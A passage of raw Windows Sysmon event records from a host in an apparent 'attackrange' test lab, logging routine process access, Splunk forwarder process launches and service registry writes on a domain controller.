Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:20.187{08A6967A-47E4-6000-4A05-000000009A01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:36.718{08A6967A-4752-6000-0705-000000009A01}50441148C:\Windows\servicing\TrustedInstaller.exe{08A6967A-4752-6000-0805-000000009A01}3832C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eb98|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:33:11.484{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000013352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:33:11.484{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000013351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:33:11.484{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000013350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:33:11.484{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d6ea79-0xcd91f164) 13241300x800000000000000013349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:33:11.484{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000013348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:33:11.484{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 10341000x800000000000000013369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.906{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-481B-6000-4C05-000000009A01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.906{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.906{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.906{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.906{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.906{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-481B-6000-4C05-000000009A01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.906{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-481B-6000-4C05-000000009A01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.907{08A6967A-481B-6000-4C05-000000009A01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.234{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-481B-6000-4B05-000000009A01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.234{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.234{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.234{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.234{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.234{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-481B-6000-4B05-000000009A01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.234{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-481B-6000-4B05-000000009A01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:15.235{08A6967A-481B-6000-4B05-000000009A01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.578{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-481C-6000-4D05-000000009A01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.578{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.578{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.578{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.578{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.578{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-481C-6000-4D05-000000009A01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.578{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-481C-6000-4D05-000000009A01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.578{08A6967A-481C-6000-4D05-000000009A01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 